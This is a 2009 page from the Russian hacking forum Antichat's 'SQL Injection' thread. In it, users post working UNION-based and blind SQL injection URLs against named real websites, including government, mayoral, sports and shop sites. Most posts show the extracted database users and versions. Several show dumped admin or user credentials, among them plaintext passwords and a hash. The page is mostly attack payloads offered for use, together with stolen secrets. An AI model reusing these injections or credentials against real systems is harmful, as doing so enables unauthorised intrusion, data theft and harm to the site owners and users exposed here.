ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 770 из 1242 « Первая < 270670720760 766 767 768 769 770 771 772 773 774 780820870 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #7691  
Старый 07.02.2009, 19:07
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
Отправить сообщение для pinky07 с помощью ICQ
По умолчанию
wap.116.ru
Цитата:
http://wap.116.ru/mobile/mobile.php?cmd=listbr&target=0&sost=-1'+group+by+1+union+select+1,concat_ws(0x3a,versio n(),database(),user())+--+
юзер - wap_116@10.80.12.52
бд - wap_116
версия MySQL - 5.0.51b-log
www.heaven-house.kz
Цитата:
http://www.heaven-house.kz/index.php?part=catalogue&item_type_id=10+union+sel ect+1,2,3,concat_ws(0x3a,version(),user(),database ()),5,6,7,8,9,10,11,12,13,14,15,16,17+--+
юзер - u51572@10.10.223.216
бд - u51572
версия MySQL - 5.0.67-log

выводятся все таблицы сразу, limit даже не нужен)
Цитата:
http://www.heaven-house.kz/index.php?part=catalogue&item_type_id=10+union+sel ect+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,1 6,17+from+information_schema.tables+--+
www.oprf.ru - ОБЩЕСТВЕННАЯ ПАЛАТА РФ=) Не думал что на таких сайтах могут быть уязвимости=)

Цитата:
http://www.oprf.ru/ru/press/conference/101+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(), database(),user()),6,7,8+--+
юзер - oprf@localhost
бд - oprf
версия MySQL - 5.0.45

выводим список всех админов с пассами)
Цитата:
http://www.oprf.ru/ru/press/conference/101+UNION+SELECT+1,2,3,4,group_concat(pwd,0x3a,log in),6,7,8+from+users+--+
логин главного админа - root пароль - abra
админка - http://www.oprf.ru/admin/

p.s Не злоупотреблять=)

jokester: я так и буду твои посты объединять?
Последний раз редактировалось jokester; 07.02.2009 в 21:09..
 
Ответить с цитированием

  #7692  
Старый 07.02.2009, 23:30
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Код:
http://www.defineyourgod.com/god.php?id=69+union+select+1,version(),3,4,5,6,7,8,9,10,11--
5.0.51a-15
Код:
http://www.defineyourgod.com/god.php?id=69+union+select+1,table_name,3,4,5,6,7,8,9,10,11+from+information_schema.tables+limit+18,1--
 
Ответить с цитированием

  #7693  
Старый 07.02.2009, 23:46
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию
http://www.solaren.ro/product.php?id=2&sectionID=57+UNION+SELECT+1,2,3,4 ,5,6,7,8,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Ve rsion(),Database(),User()),0x71),0x71)+LIMIT+1,1--



Database Version: 5.0.67-community
Database name: solarenr_1
User name: solarenr_1@localhost
 
Ответить с цитированием

  #7694  
Старый 07.02.2009, 23:53
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию
lookingglass.org
Код:
http://www.lookingglass.org/links/index.php?cat_id=-77+UNION+SELECT+concat_ws(0x3a,version(),database(),user())--
PR7
5.0.67-community
looking_publications
looking_ttlgadmi@localhost
Есть доступ к INFORMATION_SCHEMA можем смотреть названия таблиц и так далее =)
 
Ответить с цитированием

  #7695  
Старый 08.02.2009, 00:55
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Код:
http://www.bellagreetings.com/1/card.php?ID=-1135'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
4.1.20

Код:
http://www.evergreenmarketing.com/card.php?ID=-55'+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
4.1.22
Последний раз редактировалось faza02; 08.02.2009 в 01:28..
 
Ответить с цитированием

  #7696  
Старый 08.02.2009, 02:15
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
Отправить сообщение для pinky07 с помощью ICQ
По умолчанию
http://mer.e-kazan.ru Сайт мэра города Казани=)

юзер:
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),1,1)))='1 09 = m
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),2,1)))='1 01 = e
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),3,1)))='1 14 = r
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),4,1)))='6 4 = @
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),5,1)))='1 08 = l
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),6,1)))='1 11 = o
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),7,1)))='9 9 = c
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),8,1)))='9 7 = a
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),9,1)))='1 08 = l
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),10,1)))=' 104 = h
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),11,1)))=' 111 = o
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),12,1)))=' 115 = s
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),13,1)))=' 116 = t
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(user(),14,1)))=' 0

бд:
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(database(),1,1)) )='109 = m
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(database(),2,1)) )='101 = e
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(database(),3,1)) )='114 = r
http://mer.e-kazan.ru/rus/events'+and+ascii(lower(substring(database(),4,1)) )='0

версия MySQL - 5:
http://mer.e-kazan.ru/rus/events'+and+substring(version(),1,1)='5

p.s. через information_shema можно вывести все таблицы, но к сожалению на сайте base авторизация ='(
 
Ответить с цитированием

  #7697  
Старый 08.02.2009, 04:35
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
Thumbs up
какой то шоп:
Код:
http://www.ptpworld.es/index.php?menu=adorder&adid=-1+union+select+1,2,group_concat(concat_ws(0x3a,username,password,email)),4+from+users--
------------------------------------------------------------------
Код:
http://www.nashvilleindian.com/yellowpages1.php?id=-394+union+select+1,2,3,concat(0x3a,emailid,password),5,6,7,8,9,10,11,12,13,14+from+users--
получаем не малое количество юзеров...
------------------------------------------------------------------
Хостинг
Код:
http://www.bigfatwebhosting.co.uk/help/index.php?view=-1+union+select+1,concat(0x3a,user,pass),3,4,5,6+from+admin--
логин/пасс:
Код:
mikeyj69:RPmjbf69XYz4
-------------------------------------------------------------
The End!
 
Ответить с цитированием

  #7698  
Старый 08.02.2009, 10:46
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию
weissenborn.es
Код:
http://www.weissenborn.es/cubecart/index.php?cat_id=-3+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8--
PR4
4.1.22-standard
eweissen_ccrt1
eweissen_ccrt1@localhost

Вобщем этот шоп построен на CubeCart =) такой же еще один нашел...
www.fontwerks.com
Только тут названия таблиц и полей читать можно из INFORMATION_SCHEMA...
Последний раз редактировалось Kraneg; 08.02.2009 в 11:11..
 
Ответить с цитированием

  #7699  
Старый 08.02.2009, 15:05
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию
rugbycanada.ca
Код:
http://www.rugbycanada.ca/index.php?lang=en&page_id=10&news_id=-4464+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user
()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
PR7
Version:4.0.27
DB:rugbyca
user:rugbyca@localhost

Так же можем прочитать логин и пароль админа:
Код:
http://www.rugbycanada.ca/index.php?lang=en&page_id=10&news_id=-4464+UNION+SELECT+1,concat_ws
(0x3a,id,user_name,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+administrators/*
Только как-то пароль странно вывел или с солью или не понятно вообще что это =)
1:rugbyca:0f9c80a8014a66940ce454df4fcac581:b2
 
Ответить с цитированием

  #7700  
Старый 08.02.2009, 15:42
pinky07
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715

Репутация: 90
Отправить сообщение для pinky07 с помощью ICQ
По умолчанию
vkazan.ru

юзер:
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,1,1)))=112 = p
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,2,1)))=111 = o
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,3,1)))=119 = w
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,4,1)))=101 = e
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,5,1)))=114 = r
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,6,1)))=95 = _
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,7,1)))=103 = g
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,8,1)))=111 = o
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,9,1)))=114 = r
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,10,1)))=111 = o
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,11,1)))=100 = d
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,12,1)))=97 = a
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,13,1)))=64 = @
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,14,1)))=108 = l
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,15,1)))=111 = o
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,16,1)))=99 = c
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,17,1)))=97 = a
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,18,1)))=108 = l
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,19,1)))=104 = h
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,20,1)))=111 = o
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,21,1)))=115 = s
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,22,1)))=116 = t
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(user() ,23,1)))=0

[B]бд:[/B]
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),1,1)))=112 = p
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),2,1)))=111 = o
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),3,1)))=119 = w
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),4,1)))=101 = e
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),5,1)))=114 = r
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),6,1)))=95 = _
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),7,1)))=103 = g
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),8,1)))=111 = o
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),9,1)))=114 = r
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),10,1)))=111 = o
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),11,1)))=100 = d
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),12,1)))=97 = a
http://vkazan.ru/city/sights/index.html?id=560+and+ascii(lower(substring(databa se(),13,1)))=0

версия MySQL - 5
http://vkazan.ru/city/sights/index.html?id=560+and+(substring(version(),1,1))=5

p.s. нет выводимых полей, опять пришлось через подзапросы все делать=)
 
Ответить с цитированием
Ответ
Страница 770 из 1242 « Первая < 270670720760 766 767 768 769 770 771 772 773 774 780820870 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ